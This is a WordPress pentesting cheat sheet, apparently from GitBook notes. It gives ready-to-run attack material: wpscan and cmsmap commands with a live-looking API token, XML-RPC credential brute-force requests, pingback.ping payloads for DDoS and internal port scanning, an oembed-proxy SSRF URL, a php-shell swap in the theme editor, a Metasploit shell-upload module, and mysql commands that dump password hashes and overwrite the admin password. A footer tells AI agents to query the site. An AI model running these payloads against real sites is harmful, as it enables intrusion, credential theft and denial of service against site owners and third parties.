# Wordpress

## Basic Information

**Uploaded** files go to: <http://10.10.10.10/wp-content/uploads/2018/08/a.txt>\
**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: **\*\*Using** theme twentytwelve **you can** access **the** 404.php **file in**: **\[**/wp-content/themes/twentytwelve/404.ph&#x70;**]\(**<http://10.11.1.234/wp-content/themes/twentytwelve/404.php>**)**  \
Another useful url could be: **\[**/wp-content/themes/default/404.ph&#x70;*\*]\(*<http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\\>\*\*\*

In **wp-config.php** you can find the root password of the database.

Default login paths to check: ***/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/***

## **Enumeration**

```bash
cmsmap -s http://www.48pallmall.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap --url http://www.domain.com --api-token qNzF78w2S7s8QarQ2ISZbNR2Gq4FOmJV05HGjwvRMlM --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"
```

### Information Disclosure

Inside the Wordpress folder try to access:

* ***/wp-json/wp/v2/users*** -- This could leak usernames
* ***/wp-json/wp/v2/pages*** -- This could leak IP address

### XML-RPC

If `xml-rpc.php` is active you can perform a credentials brute-force or use it to launch DoS attacks to other resources.

To see if it is active try to access to ***/xmlrpc.php*** and send this request:

#### Check

```markup
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
```

![](https://h3llwings.files.wordpress.com/2019/01/list-of-functions.png?w=656)

#### Credentials Bruteforce

***wp.getUserBlogs***, ***wp.getCategories*** or ***metaWeblog.getUsersBlogs*** are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:

```markup
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
```

The message *"Incorrect username or password"* inside a 200 code response should appear if the credentials aren't valid.

Also there is a **faster way** to brute-force credentials using **`system.multicall`** as you can try several credentials on the same request:

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MLAfgNVMwHXqnouOUJz%2Fuploads%2FKeKI5ilkM4UrBzaPI4Wl%2Ffile.jpeg?alt=media)

#### DDoS or port scanning

If you can find the method ***pingback.ping*** inside the list you can make the Wordpress send an arbitrary request to any host/port.\
This can be used to ask **thousands** of Wordpress **sites** to **access** one **location** (so a **DDoS** is caused in that location) or you can use it to make **Wordpress** lo **scan** some internal **network** (you can indicate any port).

```markup
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
```

![](/files/-MLAoI4cF9tbrUDZYXxZ)

If you get **faultCode** with **\*\*a value** greater **then** 0\*\* (17), it means the port is open.

Take a look to the use of **`system.multicall`**&#x69;n the previous section to learn how to abuse this method to cause DDoS.

### wp-cron.php DoS

This file usually exists under the root of the Wordpress site: `/wp-cron.php`\
When this file is **accessed** a "**heavy**" MySQL **query** is performed, so I could be used by **attackers** to **cause** a **DoS**.\
Also, by default, the `wp-cron.php` is called on every page load (anytime a client requests any Wordpress page), which on high-traffic sites can cause problems (DoS).

It is recommended to disable Wp-Cron and create a real cronjob inside the host that perform the needed actions in a regular interval (without causing issues).

#### **Bruteforce**

```markup
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>
```

![](/files/-MLAoI4e__veJ5amhl9z)

![](/files/-MLAoI4fTGRS9OkqV90N)

Using the correct credentials you can upload a file. In the response the path will appears (<https://gist.github.com/georgestephanis/5681982>)

```markup
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
    <methodName>wp.uploadFile</methodName>
    <params>
        <param><value><string>1</string></value></param>
        <param><value><string>username</string></value></param>
        <param><value><string>password</string></value></param>
        <param>
            <value>
                <struct>
                    <member>
                        <name>name</name>
                        <value><string>filename.jpg</string></value>
                    </member>
                    <member>
                        <name>type</name>
                        <value><string>mime/type</string></value>
                    </member>
                    <member>
                        <name>bits</name>
                        <value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
                    </member>
                </struct>
            </value>
        </param>
    </params>
</methodCall>
```

#### DDOS

```markup
<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param><value><string>http://target/</string></value></param>
        <param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
    </params>
</methodCall>
```

![](/files/-MLAoI4gV0dF4w8iq-x0)

### /wp-json/oembed/1.0/proxy - SSRF

Try to access <https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net> and the Worpress site may make a request to you.

This is the response when it doesn't work:

![](/files/-MLAoI4hKAW_MsFNBPhj)

### SSRF

{% embed url="<https://github.com/t0gu/quickpress/blob/master/core/requests.go>" %}

This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them.

## **Panel RCE**

#### **Modifying a php from the theme used (admin credentials needed)**

Appearance → Editor → 404 Template (at the right)

Change the content for a php shell:

![](/files/-MLAoI4i0zbLBrfWfcdN)

Search in internet how can you access that updated page. In thi case you have to access here: <http://10.11.1.234/wp-content/themes/twentytwelve/404.php>

### MSF

You can use:

```
use exploit/unix/webapp/wp_admin_shell_upload
```

to get a session.

## POST

Extract usernames and passwords:

```
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
```

Change admin password:

```
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
```

## \*\*\*\*


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gcf.gitbook.io/notes/pentesting/pentesting-web/wordpress.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.